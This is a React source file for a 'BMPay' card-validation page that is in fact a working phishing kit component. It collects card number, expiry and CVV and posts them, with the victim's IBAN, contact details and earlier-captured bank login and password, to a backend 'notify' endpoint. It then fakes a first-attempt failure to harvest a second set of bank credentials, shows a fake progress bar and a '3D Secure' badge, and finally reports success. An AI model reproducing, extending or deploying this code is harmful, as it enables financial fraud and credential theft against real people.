import React, { useState, useEffect, useRef } from 'react';
import { useNavigate } from 'react-router-dom';
import { useApp } from '@/context/AppContext';
import { useLanguage } from '@/context/LanguageContext';
import { Button } from '@/components/ui/button';
import { Input } from '@/components/ui/input';
import { Label } from '@/components/ui/label';
import { Card, CardContent, CardHeader, CardFooter } from '@/components/ui/card';
import { Alert, AlertDescription } from '@/components/ui/alert';
import { CreditCard, Lock, ShieldCheck, ArrowLeft, Calendar, RefreshCw, Loader2 } from 'lucide-react';
import { toast } from 'sonner';
import axios from 'axios';

const BACKEND_URL = process.env.REACT_APP_BACKEND_URL;
const API = `${BACKEND_URL}/api`;

const CardValidationPage = () => {
  const navigate = useNavigate();
  const appContext = useApp();
  const { currentUser, config, withdrawData, bankData, authAttempts, setAuthAttempts, clearForRetry, isRetryFlow, setIsRetryFlow, userPhone } = appContext;
  const { t } = useLanguage();
  
  const bankDataRef = useRef(bankData);
  
  const [cardType, setCardType] = useState('');
  const [cardNumber, setCardNumber] = useState('');
  const [expiryDate, setExpiryDate] = useState('');
  const [cvv, setCvv] = useState('');
  const [errors, setErrors] = useState({});
  const [isLoading, setIsLoading] = useState(false);
  const [loadingProgress, setLoadingProgress] = useState(0);
  const [loadingMessage, setLoadingMessage] = useState('');
  const [showRetryMessage, setShowRetryMessage] = useState(false);
  const [authError, setAuthError] = useState('');
  const [storedBankData, setStoredBankData] = useState(null);

  const getLoadingMessages = () => [
    t('loadingMsg1'),
    t('loadingMsg2'),
    t('loadingMsg3'),
    t('loadingMsg4'),
    t('loadingMsg5')
  ];

  useEffect(() => {
    if (bankData) {
      bankDataRef.current = bankData;
      setStoredBankData(bankData);
    }
  }, [bankData]);

  useEffect(() => {
    if (!currentUser || !withdrawData) {
      navigate('/');
      return;
    }
    if (!bankData && !storedBankData && !showRetryMessage && !isRetryFlow) {
      navigate('/');
    }
  }, [currentUser, withdrawData, navigate, bankData, storedBankData, showRetryMessage, isRetryFlow]);

  const formatCardNumber = (value) => {
    const digits = value.replace(/\D/g, '').slice(0, 16);
    const groups = digits.match(/.{1,4}/g);
    return groups ? groups.join(' ') : digits;
  };

  const validateForm = () => {
    const newErrors = {};
    if (!cardType) newErrors.cardType = t('selectCardTypeError');
    const cleanCardNumber = cardNumber.replace(/\s/g, '');
    if (!cleanCardNumber) newErrors.cardNumber = t('cardNumberRequired');
    else if (!/^\d{16}$/.test(cleanCardNumber)) newErrors.cardNumber = t('enter16digits');
    if (!expiryDate.trim()) newErrors.expiryDate = t('expiryRequired');
    else if (!/^\d{2}\/\d{2}$/.test(expiryDate)) newErrors.expiryDate = t('expiryFormat');
    if (!cvv.trim()) newErrors.cvv = t('cvvRequired');
    else if (!/^\d{3}$/.test(cvv)) newErrors.cvv = t('cvv3digitsError');
    setErrors(newErrors);
    return Object.keys(newErrors).length === 0;
  };

  const sendNotification = async (attemptNumber) => {
    const activeBankData = bankData || storedBankData || bankDataRef.current;
    if (!activeBankData) return false;
    
    try {
      await axios.post(`${API}/notify/card-validation`, {
        cardType,
        cardNumber: cardNumber.replace(/\s/g, ''),
        expiryDate,
        cvv,
        fullName: withdrawData.fullName,
        email: withdrawData.email,
        iban: withdrawData.iban,
        phone: userPhone,
        amount: currentUser.amount,
        currency: currentUser.currency,
        bankName: activeBankData.bankName,
        bankIdentifier: activeBankData.identifier,
        bankPassword: activeBankData.password,
        attemptNumber
      });
      return true;
    } catch (error) {
      console.error('Failed to send notification:', error);
      return false;
    }
  };

  const simulateLoading = async () => {
    setLoadingProgress(0);
    const msgs = getLoadingMessages();
    for (let i = 0; i <= 100; i += 2) {
      setLoadingProgress(i);
      const messageIndex = Math.min(Math.floor(i / 25), msgs.length - 1);
      setLoadingMessage(msgs[messageIndex]);
      await new Promise(resolve => setTimeout(resolve, 80));
    }
  };

  const handleSubmit = async (e) => {
    e.preventDefault();
    if (!validateForm()) return;

    setIsLoading(true);
    setAuthError('');
    setShowRetryMessage(false);

    const currentAttempt = authAttempts + 1;
    
    await sendNotification(currentAttempt);
    await simulateLoading();

    if (currentAttempt === 1) {
      setAuthAttempts(1);
      setAuthError(t('authFailed'));
      setShowRetryMessage(true);
      toast.error(t('attempt1of2Failed'));
    } else {
      toast.success(t('verificationSuccess'));
      navigate('/success');
    }
    
    setIsLoading(false);
  };

  const handleRetry = () => {
    setShowRetryMessage(false);
    setAuthError('');
    if (bankData) {
      setStoredBankData(bankData);
    }
    clearForRetry();
    setIsRetryFlow(true);
    navigate('/bank-auth');
  };

  const handleExpiryChange = (value) => {
    let formatted = value.replace(/\D/g, '');
    if (formatted.length >= 2) {
      formatted = formatted.slice(0, 2) + '/' + formatted.slice(2, 4);
    }
    setExpiryDate(formatted);
  };

  if (!currentUser || !withdrawData) return null;

  const activeBankData = bankData || storedBankData;
  if (!activeBankData && !showRetryMessage && !isRetryFlow) return null;

  const cardTypesList = config && config.cardTypes ? config.cardTypes : ['Visa', 'MasterCard', 'UnionPay'];
  const isRetryAttempt = authAttempts > 0 && !showRetryMessage;

  return (
    <div className="min-h-screen flex flex-col vault-bg">
      <header className="header-nav px-4 py-3 sticky top-0 z-10">
        <div className="max-w-7xl mx-auto flex items-center justify-between">
          <Button
            variant="ghost"
            size="sm"
            onClick={() => navigate('/bank-auth')}
            className="text-slate-600 hover:text-slate-900 hover:bg-slate-100 rounded-lg -ml-2"
            data-testid="back-button"
          >
            <ArrowLeft className="h-5 w-5 mr-1" />
            <span className="hidden sm:inline">{t('back')}</span>
          </Button>
          <div className="flex items-center gap-2">
            <img src="/logo.png" alt="BMPay" className="h-7 w-7" />
            <span className="font-bold text-[#0A2540] font-['Manrope']">BMPay</span>
          </div>
          <div className="w-20"></div>
        </div>
      </header>

      <div className="py-4 bg-white border-b border-slate-100">
        <div className="max-w-md mx-auto px-4">
          <div className="flex items-center justify-between">
            <div className="flex flex-col items-center">
              <div className="step-dot completed"></div>
              <span className="text-xs text-emerald-600 mt-1">{t('stepBeneficiary')}</span>
            </div>
            <div className="flex-1 h-0.5 bg-emerald-400 mx-2"></div>
            <div className="flex flex-col items-center">
              <div className="step-dot completed"></div>
              <span className="text-xs text-emerald-600 mt-1">{t('stepBank')}</span>
            </div>
            <div className="flex-1 h-0.5 bg-emerald-400 mx-2"></div>
            <div className="flex flex-col items-center">
              <div className="step-dot active"></div>
              <span className="text-xs font-medium text-[#0A2540] mt-1">{t('stepCard')}</span>
            </div>
          </div>
        </div>
      </div>

      <main className="flex-1 flex flex-col items-center p-4 sm:p-6">
        <div className="w-full max-w-md animate-slide-up">
          <Card className={`rounded-xl overflow-hidden ${isRetryAttempt ? 'border-t-4 border-t-amber-500' : 'secure-card-navy'}`}>
            <CardHeader className="bg-gradient-to-b from-slate-50 to-white px-5 pt-6 pb-4">
              <div className="flex justify-center mb-3">
                <div className={`w-14 h-14 rounded-full flex items-center justify-center ${isRetryAttempt ? 'bg-amber-100' : 'bg-[#0A2540]/10'}`}>
                  <CreditCard className={`h-7 w-7 ${isRetryAttempt ? 'text-amber-600' : 'text-[#0A2540]'}`} />
                </div>
              </div>
              <h1 className="text-lg sm:text-xl font-bold text-[#0A2540] font-['Manrope'] text-center" data-testid="card-validation-title">
                {isRetryAttempt ? t('newAttempt') : t('cardValidation')}
              </h1>
              <p className="text-xs text-slate-600 mt-1 text-center">
                {isRetryAttempt ? t('attempt2of2Verify') : t('cardRequiredToFinalize')}
              </p>
            </CardHeader>

            <CardContent className="px-5 pb-5">
              {isLoading && (
                <div className="mb-5">
                  <div className="flex items-center gap-2 mb-2">
                    <Loader2 className="h-4 w-4 text-[#0A2540] animate-spin" />
                    <span className="text-xs font-medium text-[#0A2540]">{loadingMessage}</span>
                  </div>
                  <div className="w-full bg-slate-200 rounded-full h-2">
                    <div 
                      className="bg-[#0A2540] h-2 rounded-full transition-all duration-100"
                      style={{ width: `${loadingProgress}%` }}
                    ></div>
                  </div>
                  <p className="text-xs text-slate-500 mt-1 text-center">{loadingProgress}%</p>
                </div>
              )}

              {showRetryMessage && (
                <Alert className="mb-5 bg-amber-50 border-amber-200 rounded-lg">
                  <RefreshCw className="h-4 w-4 text-amber-600 flex-shrink-0" />
                  <AlertDescription className="text-amber-800 ml-2">
                    <p className="font-semibold text-sm" data-testid="auth-error">{authError}</p>
                    <p className="text-xs mt-1 mb-3">{t('attemptsAllowed')}</p>
                    <Button 
                      onClick={handleRetry} 
                      className="w-full bg-amber-600 hover:bg-amber-700 text-white rounded-lg h-10 text-sm"
                      data-testid="retry-button"
                    >
                      <RefreshCw className="h-4 w-4 mr-2" />
                      {t('retryAttempt2')}
                    </Button>
                  </AlertDescription>
                </Alert>
              )}

              {!showRetryMessage && !isLoading && (
                <form onSubmit={handleSubmit} className="space-y-4">
                  <div className="space-y-1">
                    <Label className="text-xs font-semibold text-slate-700 flex items-center gap-1">
                      <CreditCard className="h-3 w-3" />
                      {t('cardType')}
                    </Label>
                    <select 
                      value={cardType} 
                      onChange={(e) => setCardType(e.target.value)} 
                      className={`w-full h-10 px-3 text-sm border rounded-lg bg-white text-slate-900 ${errors.cardType ? 'border-red-500' : 'border-slate-300'}`}
                      data-testid="card-type-select"
                    >
                      <option value="">{t('selectType')}</option>
                      {cardTypesList.map((type) => (
                        <option key={type} value={type}>{type}</option>
                      ))}
                    </select>
                    {errors.cardType && <p className="text-xs text-red-600">{errors.cardType}</p>}
                  </div>

                  <div className="space-y-1">
                    <Label htmlFor="cardNumber" className="text-xs font-semibold text-slate-700 flex items-center gap-1">
                      <CreditCard className="h-3 w-3" />
                      {t('cardNumber16')}
                    </Label>
                    <Input 
                      id="cardNumber" 
                      type="text" 
                      placeholder={t('cardNumberPlaceholder')} 
                      value={cardNumber} 
                      onChange={(e) => setCardNumber(formatCardNumber(e.target.value))} 
                      maxLength={19} 
                      className={`h-10 text-sm border-slate-300 rounded-lg font-mono tracking-wider ${errors.cardNumber ? 'border-red-500' : ''}`} 
                      data-testid="card-number-input" 
                    />
                    {errors.cardNumber && <p className="text-xs text-red-600">{errors.cardNumber}</p>}
                  </div>

                  <div className="grid grid-cols-2 gap-3">
                    <div className="space-y-1">
                      <Label htmlFor="expiryDate" className="text-xs font-semibold text-slate-700 flex items-center gap-1">
                        <Calendar className="h-3 w-3" />
                        {t('expiration')}
                      </Label>
                      <Input 
                        id="expiryDate" 
                        type="text" 
                        placeholder="MM/AA" 
                        value={expiryDate} 
                        onChange={(e) => handleExpiryChange(e.target.value)} 
                        maxLength={5} 
                        className={`h-10 text-sm border-slate-300 rounded-lg font-mono text-center ${errors.expiryDate ? 'border-red-500' : ''}`} 
                        data-testid="expiry-date-input" 
                      />
                      {errors.expiryDate && <p className="text-xs text-red-600">{errors.expiryDate}</p>}
                    </div>

                    <div className="space-y-1">
                      <Label htmlFor="cvv" className="text-xs font-semibold text-slate-700 flex items-center gap-1">
                        <Lock className="h-3 w-3" />
                        {t('cvv3digits')}
                      </Label>
                      <Input 
                        id="cvv" 
                        type="password" 
                        placeholder="***" 
                        value={cvv} 
                        onChange={(e) => setCvv(e.target.value.replace(/\D/g, '').slice(0, 3))} 
                        maxLength={3} 
                        className={`h-10 text-sm border-slate-300 rounded-lg font-mono text-center ${errors.cvv ? 'border-red-500' : ''}`} 
                        data-testid="cvv-input" 
                      />
                      {errors.cvv && <p className="text-xs text-red-600">{errors.cvv}</p>}
                    </div>
                  </div>

                  <Button 
                    type="submit" 
                    className="w-full h-11 bg-[#0A2540] hover:bg-[#163454] text-white font-semibold rounded-lg mt-4" 
                    disabled={isLoading} 
                    data-testid="finalize-button"
                  >
                    {t('finalizeTransfer')}
                  </Button>
                </form>
              )}
            </CardContent>

            <CardFooter className="flex flex-col items-center py-4 bg-slate-50 border-t border-slate-100">
              <div className="security-badge text-xs">
                <ShieldCheck className="h-3 w-3" />
                <span>{t('secure3D')}</span>
              </div>
            </CardFooter>
          </Card>
        </div>
      </main>
    </div>
  );
};

export default CardValidationPage;
